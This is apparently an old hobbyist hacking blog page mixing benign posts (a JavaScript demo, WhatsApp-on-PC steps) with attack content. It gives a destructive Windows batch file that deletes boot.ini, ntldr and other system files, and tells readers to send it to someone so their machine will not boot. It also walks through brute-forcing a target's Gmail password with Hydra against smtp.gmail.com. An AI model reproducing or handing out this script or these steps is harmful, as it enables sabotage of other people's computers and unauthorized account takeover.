Monday, 7 July 2014
TELNET hacking tool
Telnet is the basic hacking tool, which
every hacker must know how to
use before he can even think about
Hacking. It can be used to connect
to remote computers and to run
commands by simply typing them in
it's
window.Telnet does not use the
resources of the client's computer
but
uses the resources of the server to
which the client has connected.
Basically it is a program that you will
be using to connect to your
victim's computer. It just requires
that you and your victim are both
connected to the internet.
Thumps up if you want cool TELNET
hacks
JavaScript
JavaScript is a Scripting Language
A scripting language is a lightweight
programming language.
JavaScript is programming code that can be
inserted into HTML pages.
JavaScript inserted into HTML pages, can be
executed by all modern web browsers....!!
for example this is small piece of instruction which will popup a message using button:
<!DOCtype html>
<html>
<body>
<p>
JavaScript can write directly into the HTML output stream:
</p>
<script>
document.write("<h1>This is a heading</h1>");
document.write("<p>This is a paragraph.</p>");
</script>
<p>
JavaScript can react to events. Like the click of a button:
</p>
<button type="button" onclick="alert('Welcome!')">Click Me!</button>
</body>
</html>
How To Download And Use Whatsapp On PC
Step 1. Download and Install
BlueStacks for Windows or Mac OS
X.
Step 2. Open BlueStacks.
Step 3. Click on the Search icon on
top right corner.
Step 4. Enter WhatsApp and click
on Find button.
Step 5. Click the Install button next
to WhatsApp.
Step 6. Start WhatsApp Messenger
on BlueStack
Step 7. You will now have to enter
your phone number.
Step 8. Enter the 6 digit
verification code.
Shutdown a window forever !!!
copy the code in notepad and save it
as cool.bat
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
Send it to someone and his window will
not boot again
Hack Gmail/Yahoo/Facebook Password by brute force attack using Hydra - Backtrack
First, lets take a quick overview about
what we're going to do here. We'll
apply different passwords on the
target's Gmail id from a password list
using Hydra which is available with
Backtrack It'll easily get back the
password on successful login.
Requirements:
A password.txt file with a list of
expected passwords,
Either write your own or download one(just google it)
Backtrack 5 (any version)
Internet Connection
Lets Hack something for real,
Turn on your Backtrack
Navigate to Applications > Backtrack >
Privilege Escalation > Password
Attacks > Online Attacks > hydra-gtk
and launch the hydra tool
Now, under the Target tab set
following parameters
Single target > smtp.gmail.com
port > 465
Protocol > smtp
and check > use SSL, show attempts
and Be Verbose
Click on Password tab, set these
parameters
Username > target email address
Password List > select the
Password.txt file
check the option > try Login as
password
Now move to start tab and click on
start button at the bottom to begin
the attack.
If everything goes well, then you'll
get the password.
#Note: Using a brute force attack
from a Password list will never
guarantee any successful result it
depends how lucky you're. Hacking
someones account without their
permission is a crime so do use at your
own risk.
Subscribe to:
Posts (Atom)